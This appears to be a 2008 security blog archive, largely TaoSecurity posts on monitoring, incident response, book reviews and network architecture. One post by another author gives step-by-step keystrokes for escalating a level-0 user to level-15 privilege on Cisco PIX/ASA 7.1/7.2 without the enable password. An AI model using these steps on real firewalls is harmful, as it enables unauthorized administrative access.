Selasa, 29 Januari 2008

PIX/ASA Finesse 7.1 & 7.2 Privilege Escalation

I was trying to get into admin mode without the enable password during a penetration test and i came across a post by Terry where he describes a designing flaw in the PIX/ASA Finesse Operation System, version 7.1 and 7.2. Well, it was possible to escalate a normal level 0 user to a level 15 privilege user. The exploit is simple and it only works locally, at the console and remotely with Telnet. However, do note that it will NOT work if SSH, TACACS or Radius is implemented in the firewall. Below are the steps.

1. Login with your user level 0 account. Once logon, you will be prompted to enter the enable password which is the privilege password.

2. At this prompt if you move your cursor forward with a space or character(it doesn't matter if there are more then one), and then proceed to delete any spaces or characters, by holding down the backspace a second after deleting the last character it should immediately drop you into level 15 privilege-exec mode.

It had been tested on PIX 515E, Finesse version 7.2 and i had also tested it on the PIX 525.

The Hacka Man

TSA Lessons for Security Analysts

In the past I've run several security teams, such as the Air Force CERT's detection crew and the MSSP division of a publicly traded company. In those positions I was always interested in assessing the performance of my security analysts. The CNN article TSA tester slips mock bomb past airport security contains several lessons which apply to this domain.

Jason, a covert tester for the Transportation Security Administration, has been probing airport weaknesses for five years, beginning with big mock bombs before switching to ever smaller devices as the TSA adapts to evolving terrorist threats...

Even before the September 11, 2001, terror attacks, government agencies deployed "red teams" such as this one to look for holes in airport security...

But instead of running from tests, the agency has embraced the idea that testing has a value that goes beyond measuring the performance of individual screeners.

Tests, the TSA says, can show systemwide security vulnerabilities...

[S]creeners who fail to detect contraband are "pulled off the line" and retrained before being allowed back.

The test CNN witnessed was conducted by the TSA's Office of Inspection, which the agency calls the most sophisticated of its covert tests. But there are others.

For starters, every TSA X-ray machine has a Threat Image Projection system, which digitally inserts images of guns, knives and bombs into the X-rays of luggage, to keep screeners alert...

If screeners observe a suspicious object, they can check with the simple click of a computer mouse. If they detect a threat object, the computer congratulates them. Successes and failures are recorded for use in a screener's performance evaluation and are factors in determining pay.

Some 69,929 threat image tests are conducted on an average day, or more than 25 million tests per year. An array of other tests also are conducted to assess screeners, including the red team ones.


I've described elsewhere why I support red teams. I certainly recognize that one of my Three Wise Men savages red teams, but I've never seen anything else -- short of an actual incident -- make a dent in the attitudes of management. Furthermore, red teaming, as a real-life test, tends to discover and link vulnerabilities in ways not anticipated by some vulnerability assessors (blue teams) and general security architects. There's no ground truth like saying "I accomplished the mission using this method" when someone is claiming their network is "secure."

I also like the method to test analysts by inserting false images. Fighting analyst boredom is a big problem in some operational teams.

From Linux to FreeBSD with Depenguinator 2.0

If you read Colin Percival's blog you will notice he posted a message about Depenguinator 2.0. This is a method to convert a Linux system to FreeBSD remotely. Colin tested the script using Ubuntu 7.10. I have a few Red Hat 8.0 systems and one or more Fedora Core 4 systems that I would like to convert to FreeBSD 7.0.

I tried using Depenguinator 2.0 to convert a test CentOS 5.1 system to FreeBSD 7.0, but I ran into multiple problems. These included difficulty installing Depenguinator dependencies and possible interference from SELinux capabilities.

If someone wants to try testing Depenguinator 2.0 on a Red Hat 8.0 system or a Fedora Core 4 system, please do so and let me know how it goes. Thank you.

Senin, 28 Januari 2008

NoVA Sec Meeting 1930 Thu 31 Jan 08

I was determined to start 2008 right by having a NoVA Sec meeting in January. Thursday night is our last chance, but thanks to last-minute coordination with Dowless and Associates we have a meeting location.

The next NoVA Sec meeting will take place 1930 Thursday 31 January 2008 at Dowless and Associates:

13873 Park Center Rd.
Suite 450
Herndon, VA 20171

Devin will speak and demo his One Laptop Per Child (OLPC) box.

Our host is requesting a list of names of attendees, so please RSVP via email (taosecurity at gmail dot com) by end of day Wednesday 30 January 2008. Thank you.

Remember, there are no dues and no requirements for membership. We do leave certifications, FISMA, the certification and accreditation (C&A) process, and related items in the parking lot.

Note: I am only cross-posting this one NoVA Sec announcement because it has been a while since we held a NoVA Sec meeting. I will post future announcements only on the NoVA Sec blog and mailing list.

Minggu, 27 Januari 2008

Is Jerome Kerviel Hacking?

If you read the headline of today's Washington Post story French Bank Says Trader Hacked Computers you might get the impression that Société Générale trader Jerome Kerviel is some kind of shellcoding ninja, Web 2.0 JavaScript samurai, or at the very least a script kiddie who can run Metasploit with the best of the certified ethical hackers. The truth of the matter is probably mixed. Kerviel is most likely a fraudster who took advantage of trading processes and controls.

The best source I've found so far is the Reuters article FACTBOX: Rise and fall of the SocGen rogue trader. It outlines the fraud thus:

* The alleged fraud, as outlined by the bank, included a genuine long position in regulated stock market index futures, contracts bought in the hope that prices would rise.

* Usually an arbitrageur hedges such a long position with an equal and opposite sale, or short position, reaping a profit from any gaps between the values of the two transactions.

* The SocGen trader did hedge the first position with a second, but the trades in that portfolio were fake. So the bank was unwittingly holding long futures positions without cover, leaving it exposed to the risk that prices would fall.

* To evade controls, for the second portfolio he chose unregulated over-the-counter derivatives which do not need a downpayment, including forward contracts.

* Because there was no downpayment, or margin, these trades were not subject to the same immediate checks as the real futures positions held in the first portfolio.

* Since the real and fake trades balanced each other out, SocGen says its computers perceived "low residual risk" overall.

* As the market turned against him, he sought to cover up mounting losses to avoid further tiers of compliance checks.


The only "computer" angle (besides tricking the controls which measure risk) involved the following:

* The bank alleges that he misappropriated computer passwords and faked documents.

"Misappropriating computer passwords" could be accomplished by using shared accounts, accounts on sticky notes, or any of the other poor practices used in group settings.

Lending credence to the computer angle is this Wall Street Journal story:

According to Mr. Bouton, the Société Générale chairman, Mr. Kerviel began conducting fraudulent trades sometime in 2007. People familiar with Mr. Kerviel's behavior believe he worked late into the night, essentially burrowing into Société Générale's computers, as he allegedly built a multilayered way to hide his trades by hacking into the computer systems.

Société Générale's computer systems are considered some of the most complex in banking for handling equity derivatives, that is, investment contracts whose value moves with the value of other assets. Officials of the bank believe Mr. Kerviel spent many hours of hacking to eliminate controls that would have blocked his super-sized bets. Changes he is said to have made enabled him to eliminate credit and trade-size controls, so the bank's risk managers couldn't see his giant trades on the direction of indexes.


If we focus on what Kerviel is alleged to have done, rather than how it is described, it's possible the "elimination of controls" via "changes" could be considered "hacking."

Let's see what happens! The only good aspect of this intrusion is that the investigation report should be public, because the offender is going to be prosecuted.

Sabtu, 26 Januari 2008

Corporate Digital Responsibility

I've started listening to the Economist Audio Edition on my iPod while running. Last week I listened to a special report on Corporate Social Responsibility. I was struck by the language used and issues discussed in the report. Here are a few excepts.

First, from Just good business:

Why the boom [in CSR initiatives]? For a number of reasons, companies are having to work harder to protect their reputation — and, by extension, the environment in which they do business...

CSR is now made up of three broad layers, one on top of the other. The most basic is traditional corporate philanthropy... [T]he second layer of CSR... is a branch of risk management... So, often belatedly, companies respond by trying to manage the risks. They talk to NGOs and to governments, create codes of conduct and commit themselves to more transparency in their operations. Increasingly, too, they get together with their competitors in the same industry in an effort to set common rules, spread the risk and shape opinion.

All this is largely defensive, but companies like to stress that there are also opportunities to be had for those that get ahead of the game. The emphasis on opportunity is the third and trendiest layer of CSR: the idea that it can help to create value...

That is just the sort of thing chief executives like to hear... Businesses have eagerly adopted the jargon of “embedding” CSR in the core of their operations, making it “part of the corporate DNA” so that it influences decisions across the company.

With a few interesting exceptions, the rhetoric falls well short of the reality.


Next, from The next question: Does CSR work?:

Three years ago a special report in The Economist acknowledged, with regret, that the CSR movement had won the battle of ideas. In the survey by the Economist Intelligence Unit for this report, only 4% of respondents thought that CSR was “a waste of time and money”. Clearly CSR has arrived...

[In one sense], the best form of corporate responsibility boils down to enlightened self-interest. And the more that firms embracing it are seen to be successful — through astutely managing risks and recognising opportunities — the more enlightened their leaders will be perceived to be. But do such policies really help to bring success? If not, the whole CSR industry has a problem. If people are no longer asking “whether” but “how”, in future they will increasingly want to know “how well”. Is CSR adding value to the business?

At present few companies would be able to tell. CSR decisions rely more on instinct than on evidence. But a measurement industry of sorts is springing up. Many big firms now publish their own sustainability reports, full of targets and commitments. The Global Reporting Initiative, based in Amsterdam, aspires to provide an international standard, with 79 indicators that it encourages companies to use. This may be a useful starting point, but critics say it often amounts to little more than box-ticking; worse, it can provide a cover for poor performers...


From A stich in time: How companies manage risks to their reputation:

Business leaders embrace corporate responsibility for a number of reasons... For some, though, it is public embarrassment and lawsuits that concentrate the mind... Trouble seems to come in waves, pounding industry after industry, each time for a different reason... Most of the rhetoric on CSR may be about doing the right thing and trumping competitors, but much of the reality is plain risk management. It involves limiting the damage to the brand and the bottom line that can be inflicted by a bad press and consumer boycotts, as well as dealing with the threat of legal action...

Time and again companies fail to see the problems coming. Only once they have had to deal with, say, a lawsuit or strong public pressure do they start to change their thinking...

For the moment, though, the biggest problem many companies have to deal with is something that has sprung from rapid globalisation. It is the risks associated with managing supply chains that spread around the world, stretching deep into China, India and elsewhere...

Firms can set standards of behaviour for suppliers, but they do not find it easy to enforce them... So inspection regimes are set to intensify, at a time when audit fatigue has already become a problem for suppliers...

Each industry has its own specific issues, but there are some common themes in how firms are approaching the risk-management side of CSR. One is to put in place proper systems for monitoring risk across the supply chain, including listing who the suppliers are, having well-established channels of communicating with them and auditing their compliance with ethics codes. Basic as it sounds, even many big companies fail to do this...

Beyond the basics, prudent companies include a CSR perspective when considering new projects...

Novo Nordisk, a Danish company that supplies a big share of the world's insulin, has written the “triple bottom line” — that is, striving to act in a financially, environmentally and socially responsible way — into its articles of association...


Finally, from Do it right:

One way of looking at CSR is that it is part of what businesses need to do to keep up with (or, if possible, stay slightly ahead of) society's fast-changing expectations. It is an aspect of taking care of a company's reputation, managing its risks and gaining a competitive edge. This is what good managers ought to do anyway. Doing it well may simply involve a clearer focus and greater effort than in the past, because information now spreads much more quickly and companies feel the heat...

If it is nothing more than good business practice, is there any point in singling out corporate social responsibility as something distinctive? Strangely, perhaps there is, at least for now. If it helps businesses look outwards more than they otherwise would and to think imaginatively about the risks and opportunities they face, it is probably worth doing. This is why some financial analysts think that looking at the quality of a company's CSR policy may be a useful pointer to the quality of its management more generally...

[I]n a growing number of companies CSR goes deeper than that and comes closer to being “embedded” in the business, influencing decisions on everything from sourcing to strategy. These may also be the places where talented people will most want to work.

The more this happens, ironically, the more the days of CSR may start to seem numbered. In time it will simply be the way business is done in the 21st century. “My job is to design myself out of a job,” says one company's head of corporate responsibility...


Is it obvious by now that you could replace CSR in all of these cases with "digital security"? Is it now time for a "quadruple bottom line" -- "striving to act in a financially, environmentally, socially, and digitally responsible way?

We in the digital security field need to talk to these CSR people and figure out how they are making progress. We share almost exactly the same goals but they are winning the battle of ideas. In digital security, too many companies "fail to see the problems coming. Only once they have had to deal with, say, a lawsuit or strong public pressure do they start to change their thinking."

Note: Prior to this blog post the only mention of "corporate digital responsibility" I could find via Google is a SEC filing for Bank Bradesco.

Kamis, 24 Januari 2008

Review of The Best of FreeBSD Basics Posted

Amazon.com just posted my four star review of The Best of FreeBSD Basics by Dru Lavigne. From the review:

In mid-2004 I reviewed Dru Lavigne's book BSD Hacks, which I really enjoyed. 3 1/2 years later I am pleased to say that Dru's latest book, The Best of FreeBSD Basics (TBOFB), is another excellent resource for FreeBSD users. I really wish this book had been available in 2000 when I started using FreeBSD! If you are a beginner to intermediate FreeBSD user, you will find this book invaluable. If you are an advanced user, you may find a helpful tip or two as well.

Minggu, 20 Januari 2008

Review of Time Based Security Posted

Amazon.com just posted my three star review of Time Based Security by Winn Schwartau. From the review:

Time Based Security (TBS) was largely written 10 years ago. The author gave me a copy about 3 years ago at a security conference. What's remarkable about the concept of TBS is that it was as relevant 10 years ago as it is today. The "risk avoidance" idea and "fortress mentality" described in TBS are as prevalent in this decade as they were in the 1990s, and they continue to fail us. TBS, as an alternative approach, is a powerful way to estimate the security posture of an asset. However, TBS the book is not the best way to make this argument (hence the three star rating). I would like to see TBS (published in 1999, but including older material) rewritten as a tenth anniversary edition and released in digital format, perhaps as a digital Short Cut.

I recommend reading the whole review. I heavily quoted the parts I liked. I also just updated the links in my 2005 post Where in the World Is Winn Schwartau?.

More on 2008 Predictions

In Predictions for 2008 in included the following:

3) Expect increased awareness of external threats and less emphasis on insider threats. Maybe this is just wishful thinking, but the recent attention on botnets, malware professionalization, organized criminal cyber enterprises, and the like seems to be helping direct some attention away from inside threats. This may be premature for 2008, but I expect to see more coverage of outsiders again.

Today I saw the SANS Top Ten Cyber Security Menaces for 2008. (I thought using the term "menace" neatly sidesteps trying to classify these items using traditional terms, since the list mixes threats, attacks, tools, and so on.) Here is the "consensus list," according to 12 "cyber security veterans," in ranked order:

  1. Increasingly Sophisticated Web Site Attacks That Exploit Browser Vulnerabilities - Especially On Trusted Web Sites

  2. Increasing Sophistication And Effectiveness In Botnets

  3. Cyber Espionage Efforts By Well Resourced Organizations Looking To Extract Large Amounts Of Data - Particularly Using Targeted Phishing

  4. Mobile Phone Threats, Especially Against iPhones And Android-Based Phones; Plus VOIP

  5. Insider Attacks

  6. Advanced Identity Theft from Persistent Bots

  7. Increasingly Malicious Spyware

  8. Web Application Security Exploits

  9. Increasingly Sophisticated Social Engineering Including Blending Phishing with VOIP and Event Phishing

  10. Supply Chain Attacks Infecting Consumer Devices (USB Thumb Drives, GPS Systems, Photo Frames, etc.) Distributed by Trusted Organizations


I've written before that I am not a big fan of expert opinions, but this is a generic list that does not try to "measure risk" for a particular organization. I still prefer alternatives, but I find it fascinating that the big bad insider is listed as number 5. Every other item is arguable an outsider problem, as my prediction stated. The first three are absolutely outsider-based. I take all of this as a good sign that the tide is turning (again).

Sabtu, 19 Januari 2008

Thoughts on Oracle Non-Patching

Thanks to SANS Newsbites (probably the best weekly security round-up around) for pointing me to the story Two-thirds of Oracle DBAs don't apply security patches. They are all citing this Sentrigo press release, which I will quote directly:

Sentrigo, Inc., an innovator in database security software, today announced survey results indicating that most Oracle database administrators do not apply the Critical Patch Updates (CPUs) that Oracle issues on a quarterly basis...

When asked: “Have you installed the latest Oracle CPU?” – Just 31 people, or ten percent of the 305 respondents, reported that they applied the most recently issued Oracle CPU.

When asked: “Have you ever installed an Oracle CPU?” – 206 out of 305 OUG attendees surveyed, or 67.5 percent of the respondents said they had never applied any Oracle CPU.


Of course, Sentrigo has a business reason for reporting these figures:

Sentrigo created Hedgehog, a host-based database activity monitoring and protection software solution, to detect and prevent unauthorized database use by hackers and company insiders. Hedgehog’s unique virtual patching ability immediately protects databases against vulnerabilities that have been discovered, but not yet patched, as well as against zero-day exploits of certain types.

Hedgehog installs on the database server itself, unlike a product such as BlueLane which is network-based.

When I read a story like this, it shows me that Oracle servers in such a configuration have effectively decided to avoid the resistance phase of security operations. (Others call this "protection" or "prevention," but since all such measures are ultimately doomed I prefer using "resistance.") All that's left is detection and response. Somehow I don't think companies that have never installed an Oracle CPU are devoting extra resources to detection and response.

However, I consider it a valid strategy to spend more time on detection and response if the cost of resisting is considered to be too high. (I am probably being generous here.) Detection and response is the only viable strategy when confronting the most advanced and persistent threats, because no degree of resistance will prevent compromise.

In shops where patching is never done, the only event which could possibly convince a database administrator and his/her management to apply patches would be a severe incident. If, however, you don't bother devoting resources to detection, you may never know you were compromised. It's disappointing how that works. At some point your breach may make the papers, but right now there's still a pervasive attitude that "it won't happen to us."

At the end of the day I remain convinced that building visibility in (BVI), then using that visibility to build rapid and skilled detection and response capabilities, is the best we can do. Of course I would like to see the government and commercial building security in (BSI) initiatives make progress, since their success means less work on more routine intrusions for CSIRTs. However, BSI without BVI leaves us in the same state we find ourselves now, except the intrusion methodologies will have moved "up the value chain."

Is This For Real?

I'm not sure if this is real: CIA Admits Cyberattacks Blacked Out Cities:

The CIA on Friday admitted that cyberattacks have caused at least one power outage affecting multiple cities outside the United States.

Alan Paller, director of research at the SANS Institute, said that CIA senior analyst Tom Donahue confirmed that online attackers had caused at least one blackout...

Paller said that Donahue presented him with a written statement that read, "We have information, from multiple regions outside the United States, of cyber intrusions into utilities, followed by extortion demands. We suspect, but cannot confirm, that some of these attackers had the benefit of inside knowledge. We have information that cyberattacks have been used to disrupt power equipment in several regions outside the United States. In at least one case, the disruption caused a power outage affecting multiple cities. We do not know who executed these attacks or why, but all involved intrusions through the Internet."


Two points: 1) This statement mentions cities outside the US, not inside. 2) Since when does the CIA release information like this in a letter to SANS?

Jumat, 18 Januari 2008

2008 Predictions Panning Out

Almost one month ago I wrote Predictions for 2008. They included 2) Expect greater military involvement in defending private sector networks. and 4) Expect greater attention paid to incident response and network forensics, and less on prevention.

Relevant to number 2, today I read Intelligence Chief Proposes Wide Cyber Surveillance, which says:

US National Intelligence Director says government should be able to tap all email, file transfers, and Web searches..

In an interview scheduled to be published in Monday's forthcoming edition of The New Yorker, McConnell offers some insight into his long-awaited draft U.S. Cyber-Security Policy...

To accomplish his plan, the government must have the ability to read all the information crossing the Internet in the United States -- in order to protect it from abuse.

The plan gives government agencies the right to monitor email, file transfers, and even Web searches, according to reports. McConnell's proposals also include reducing the number of gateways between government computers and the Internet from 2,000 to 50, as well as implementing a dragnet to monitor electronic traffic.


Relevant to number 4, today I read
Tech Insight: Incident Response
, which says:

Incident response (IR) for many IT shops traditionally has been accomplished by cobbling together tools from various sources with a script-based tool that automates the collection of data from the suspect system. An IR team member or help desk technician is sent to investigate a problem, with a USB thumb drive in hand that contains the collection of tools. The tools are then run, and the output analyzed to detect the source of the suspicious behavior. It’s neither a quick nor efficient process.

All manual incident response is slow response, says Kevin Mandia, president and CEO of Mandiant. A key driver for organizations dealing with incidents, especially those in the financial sector, Mandia says, is speed and minimizing exposure: The IR team must be able to quickly grab information about the incident, determine what’s happening, and respond appropriately to minimize collateral damage...

With new products on the horizon, IT groups looking to streamline their current IR practices or to simply start an IR program for the first time, should keep an eye on evolving products and new releases due out in within the next month.


I plan to visit MANDIANT and HBGary within the next month. I have trial software from Technology Pathways to test. I have a copy of NetWitness Investigator Field Edition in my lab kit now. I have a copies of AccessData FTK 2.0 and Guidance Software Encase Forensic en route. There's a lot happening in the IR and forensic space, so I think 2008 will be a big year.

Review of Security Power Tools Posted

Amazon.com just posted my four star review of Security Power Tools by a team of authors, mostly from Juniper. From the review:

I am probably the first reviewer to have read the vast majority of Security Power Tools (SPT). I do not think the other reviewers are familiar with similar books like Anti-Hacker Toolkit, first published in 2002 and most recently updated in a third edition (AHT3E) in Feb 2006. (I doubt the SPT authors read or even were aware of AHT3E.) SPT has enough original material that I expect at least some of it will appeal to many readers, justifying four stars. On the other hand, a good portion of the material (reviewed previously as "the most up-to-date tools") offers nothing new and in some cases is several years old.

Kamis, 17 Januari 2008

Reminder: Bejtlich Teaching at Black Hat DC 2008 Training

I just wanted to remind interested readers that Black Hat was kind enough to invite me back to teach TCP/IP Weapons School at Black Hat DC 2008 on 18-19 February 2008, at the Westin Washington DC City Center. This is currently my only scheduled training class in 2008. As you can see from the course description I will focus on OSI model layers 2-5 and add material on network security operations, like monitoring, incident response, and forensics. The cost for this single two-day class is now $2200 until 8 February (three weeks from now), when online registration closes and the price increases to $2400. Register while seats are still available -- both of my sessions in Las Vegas sold out. Thank you.

Snort Frequently Asked Questions Podcast Posted

About a month ago I recorded a podcast for SearchSecurityChannel.com. It's a series of frequently asked questions. SSC is for the "channel," which means "vendors," but everything in the podcast applies to Snort operators. You should be able to reach the podcast via this link. Note that when I recorded the podcast we didn't know that Emerging Threats would replacing Bleeding Threats.

Selasa, 15 Januari 2008

Web Attacker Toolkit

Sorry for the lack of updates. Been roaming around for the past 2 months and felt a little lazy in updating my blog. i was reading news on the internet today and i read something about a hacking toolkit that was able to compromise thousands of webservers and that caught my attention. Well, apparently the tool called the "Web Attacker Toolkit" can be bought from the Russian hacking group called Inex-Lux for a cheap price. All unpatched IE and Firefox browsers can be compromised, with a trojan silently being installed into the local PC without user knowing it. Once a trojan is installed, the game is over. After reading the news, of course i have upgraded my IE and my Firefox to the latest version to avoid any exploitation. Check out those three links below:

http://www.informationweek.com/news/showArticle.jhtml?articleID=186700539

http://www.websense.com/securitylabs/alerts/alert.php?AlertID=472

http://informationweek.com/news/showArticle.jhtml?articleID=205603044

The Hacka Man

Senin, 14 Januari 2008

Unposted Review: Network Security Assessment 2nd Ed

I wrote a 4 star review of review of the first edition of Network Security Assessment by Chris McNab in May 2004. I read the second edition and tried to post a three star review at Amazon.com. Unfortunately, Amazon.com would not let me post a new review because I reviewed the first edition. Therefore, here is my review:

In May 2004 I reviewed the first edition of Network Security Assessment (NSA1). Almost four years later, the second edition (NSA2) is basically the same book. This makes sense, given the majority of the action in digital security over the last 5-6 years has occurred at the application layer, not the network layer. (For reference, OWASP -- the Open Web Application Security Project -- was created in 2002.) The end result is the material in NSA2 is a foundation for higher level assessments. While NSA2 contains chapters on Assessing Web Servers and Assessing Web Applications, it doesn't devote enough depth to change the focus of the book.

In some ways NSA2 is a step backward from NSA1. First, I liked the end-to-end case study in NSA1. The case study applied the author's methodology in a simulated customer assessment. I prefer reading that sort of material to a list of tools. Unfortunately, the case study is gone in NSA2. Second, NSA2 wastes too many tables enumerating CVE entries of vulnerabilities in various applications. A directive to the reader to check CVE or a similar Web site directly would have been better. Third, the appendices really add nothing but filler. Similar to the CVE listings, it's not necessary to waste paper printing the vulnerabilities exploited by CANVAS, CORE IMPACT, and Metasploit.

Because NSA2 markets itself as a "network security assessment" book, I think the author should have focused on layers 1-4 and left 5-7 for other books. I accept that the author chose not to discuss wireless issues, since that medium has entire books devoted to it. However, I was disappointed that NSA2 decided to once again start at layer 3. If you're going to write a network book, why not address layer 2 attacks? Are all assessments done remotely, with only layer 3 available?

NSA2 does update material from NSA1, and adds some new items. I think NSA2 would be a good book for a PCI auditor who sticks to his/her script and ensures the basics are covered. Those looking for a thorough assessment are going to spend time in areas (like Web apps) not well-covered in NSA2.

I recommend reading my May 2004 review of the first edition, because most of that review still applies to NSA2. At this point people wanting to read this sort of material should probably turn to the Hacking Exposed series. I like the approach taken in HE, because there is a core book that is augmented by domain-specific books (Windows, Web 2.0, Linux, etc.).

Kamis, 10 Januari 2008

Defensible Network Architecture 2.0

Four years ago when I wrote The Tao of Network Security Monitoring I introduced the term defensible network architecture. I expanded on the concept in my second book, Extrusion Detection. When I first presented the idea, I said that a defensible network is an information architecture that is monitored, controlled, minimized, and current. In my opinion, a defensible network architecture gives you the best chance to resist intrusion, since perfect intrusion prevention is impossible.

I'd like to expand on that idea with Defensible Network Architecture 2.0. I believe these themes would be suitable for a strategic, multi-year program at any organization that commits itself to better security. You may notice the contrast with the Self-Defeating Network and the similarities to my Security Operations Fundamentals. I roughly order the elements in a series from least likely to encounter resistance from stakeholders to most likely to encounter resistance from stakeholders.

A Defensible Network Architecture is an information architecture that is:

  1. Monitored. The easiest and cheapest way to begin developing DNA on an existing enterprise is to deploy Network Security Monitoring sensors capturing session data (at an absolute minimum), full content data (if you can get it), and statistical data. If you can access other data sources, like firewall/router/IPS/DNS/proxy/whatever logs, begin working that angle too. Save the tougher data types (those that require reconfiguring assets and buying mammoth databases) until much later. This needs to be a quick win with the data in the hands of a small, centralized group. You should always start by monitoring first, as Bruce Schneier proclaimed so well in 2001.

  2. Inventoried. This means knowing what you host on your network. If you've started monitoring you can acquire a lot of this information passively. This is new to DNA 2.0 because I assumed it would be already done previously. Fat chance!

  3. Controlled. Now that you know how your network is operating and what is on it, you can start implementing network-based controls. Take this anyway you wish -- ingress filtering, egress filtering, network admission control, network access control, proxy connections, and so on. The idea is you transition from an "anything goes" network to one where the activity is authorized in advance, if possible. This step marks the first time where stakeholders might start complaining.

  4. Claimed. Now you are really going to reach out and touch a stakeholder. Claimed means identifying asset owners and developing policies, procedures, and plans for the operation of that asset. Feel free to swap this item with the previous. In my experience it is usually easier to start introducing control before making people take ownership of systems. This step is a prerequisite for performing incident response. We can detect intrusions in the first step. We can only work with an asset owner to respond when we know who owns the asset and how we can contain and recover it.

  5. Minimized. This step is the first to directly impact the configuration and posture of assets. Here we work with stakeholders to reduce the attack surface of their network devices. You can apply this idea to clients, servers, applications, network links, and so on. By reducing attack surface area you improve your ability to perform all of the other steps, but you can't really implement minimization until you know who owns what.

  6. Assessed. This is a vulnerability assessment process to identify weaknesses in assets. You could easily place this step before minimization. Some might argue that it pays to begin with an assessment, but the first question is going to be: "What do we assess?" I think it might be easier to start disabling unnecessary services first, but you may not know what's running on the machines without assessing them. Also consider performing an adversary simulation to test your overall security operations. Assessment is the step where you decide if what you've done so far is making any difference.

  7. Current. Current means keeping your assets configured and patched such that they can resist known attacks by addressing known vulnerabilities. It's easy to disable functionality no one needs. However, upgrades can sometimes break applications. That's why this step is last. It's the final piece in DNA 2.0.


So, there's DNA 2.0 -- MICCMAC (pronounced "mick-mack"). You may notice the Federal government is adopting parts of this approach, as mentioned in my post Feds Plan to Reduce, then Monitor. I prefer to at least get some monitoring going first, since even incomplete instrumentation tells you what is happening. Minimization based on opinion instead of fact is likely to be ugly.

Did I miss anything?

How can a blog reader find competent operations personnel?

I received the following question from a blog reader. I am interested in hearing what you think.

I'm team lead for a small private-sector security operations team. We are fortunate that we have a reasonably interesting and attractive work environment, readily available financial resources, and a relatively manageable event load.

We've been trying to hire a mid to senior level analyst position for at least a year now, and have been having absolutely no luck whatsoever.

The job responsibilities mainly consist of analyzing events from the SEM and NSM stacks, documenting and resolving incidents, and conducting regular vulnerability management operations.

A majority of the applications we get seem to come from security "architects" who may have some product deployment experience, but little to no applicative analysis skills necessary to un-haystack the needles, or pursue an incident to closure.

Very few of the interviewees can even get past the technical phone screen, which consists of the following three questions:

  1. You see an IDS/IPS event in your event console called "some kind of IDS event name here".

    • What would you do to investigate the event, and how would you validate that the event was a real attack and not a false positive?

    • How would you determine if this was a one-off event, or part of an overall pattern?

    • What other kinds of information would you seek out to build a more complete picture of the context around this event?


  2. After having investigated the event, you have gathered enough positive indicators that the actual traffic consisted of a legitimate attack against a server you suspect may be vulnerable to an an attack of that kind.


    • How do you determine what may have happened to the server? (This question is usually geared towards whatever platform the candidate might have actual technical experience with.)

    • What would you do if you saw a subsequent event that indicated the target system had downloaded a file from the internet soon after the original IDS event?

    • How could you recover the file? What would you do to analyze it? (This question usually evolves into some platform-specific live forensics, network forensics, and incident response.)


  3. You conduct a vulnerability scan that produces output that indicates that a server X (operating system Y) may be vulnerable to issue Z.


    • What would you do to validate the finding?

    • How would you validate the finding if the report indicated the issue was present on 100 machines? (This again is usually geared towards a platform that the candidate has the most experience with).

    • What would you do to address the issue?



These three topic areas seem to cut to the core of what raw analysis tasks an operations analyst must be able to perform well. The kinds of answers I expect are specific, detailed, and accurate given the scenarios supplied (i.e. application-level attack against a 3-tier windows-based web application merits one kind of response vs. a client-side buffer overflow attack against a web browser, etc.).

Maybe one or two of our candidates out of several dozen have even been able to answer them competently enough for a second round (and they eventually accepted more lucrative offers). I'd even be happy if the candidates could get two out of three.

Am I setting the bar too high? Are there some magic keywords in the job req that I'm missing? Am I going to have hire juniors and train them up? Is there even such a thing as a senior operations analyst?


My initial response is that the number of people who can independently and competently answer these questions is remarkably small. Furthermore, the number of shops that are collecting the data necessary to answer these questions is also small.

What do blog readers think?

Senin, 07 Januari 2008

Happy 5th Birthday TaoSecurity Blog

Today, 8 January 2008, is the fifth birthday of TaoSecurity Blog. I wrote my first post on 8 January 2003 while working as an incident response consultant for Foundstone. 2087 posts (averaging 417 per year !?!) later, I am still blogging.

My pace has slowed during the last few months, mainly because I have been spending more time reading in my off hours. I have also found less really gripping security events to report. I try not to jump on the bandwagon, so if you see a lot of coverage for a certain event I will probably not report it. I might chime in if there's an uncovered angle or I particularly want to record my thoughts on the issue.

I plan to continue blogging, especially with respect to network security monitoring, incident detection and response, network forensics, and FreeBSD when appropriate. I especially enjoy reading your comments and engaging in informed dialogues. Thanks for joining me these five years -- I hope to have a ten year post in 2013!

Don't forget -- today is Elvis Presley's birthday. Coincidence? You decide.

The image shows Elvis training with Ed Parker, founder of American Kenpo. As I like to tell my students, Elvis' stance is so wide it would take him a week to react to an attack. Then again, he's Elvis.

I studied Kenpo in San Antonio, TX and would like to return to practicing if my shoulder cooperates!

Sussy McBride Shouts: I got hacked

Thanks to Sensepost for reporting this story last month. They describe an advisory published by Charles Miller and Dino Dai Zovi whereby arbitrary characters in Second Life are digitally mindjacked and robbed. By walking on "land" owned by an attacker, and having Second Life configured to automatically display video, a victim's avatar and computer can be exploited via the November 2007 Quicktime vulnerability. In the YouTube video you can see "Sussy McBride" be freeze, shout "I got hacked," and give her money to the attacker.

I am fascinated by this story because it is the natural progression from a 2006 post Security, A Human Problem describing a Second Life denial of service attack. In that post I said:

First, it demonstrates that client-side attacks remain a human problem and less of a technical problem. Second, I expect at some point these virtual worlds will need security consultants, just like the physical world. I wonder if someone could write a countermeasure at the individual player level for these sorts of attacks?

I wonder if anyone in Second Life will start creating disposable bodyguard avatars to walk in front of highly-valued avatars, thereby acting as "digital mine detectors?"

Review of Virtual Honeypots Posted

Amazon.com just posted my five star review of Virtual Honeypots by Niels Provos and Thorsten Holz. From the review:

It's fairly difficult to find good books on digital defense. Breaking and entering seems to be more exciting than protecting victims. Thankfully, Niels Provos and Thorsten Holz show that defense can be interesting and innovative too. Their book Virtual Honeypots is your ticket for deploying defensive resources that will provide greater digital situational awareness.

Snort Report 12 Posted

My 12th Snort Report titled Snort Frequently Asked Questions is posted. From the start of the article:

Service provider takeaway: Snort isn't perfect. In this tip, service providers will learn the answers to frequently asked questions about Snort's usage and limitations.

In this edition of the Snort Report, I address some of the questions frequently asked by service providers who are users or potential users of Snort. I say "potential users" because some people hear about Snort and wonder if it can solve a particular problem. Here I hope to provide realistic expectations for service providers using Snort.


Again, please note I did not write the words "Snort isn't perfect." The editor did. This is one of the aspects of the Snort Report I do not control. In this article I address these questions.

  1. Can I use Snort to protect a network from denial-of-service attacks?

  2. Can Snort decode encrypted traffic?

  3. Can Snort detect layer 2 attacks?

  4. Can Snort log flows or sessions?

  5. Can Snort rebuild content from traffic?


If you like this article and have your own Snort questions, please post them here as comments. Thank you.

Bejtlich Interviews

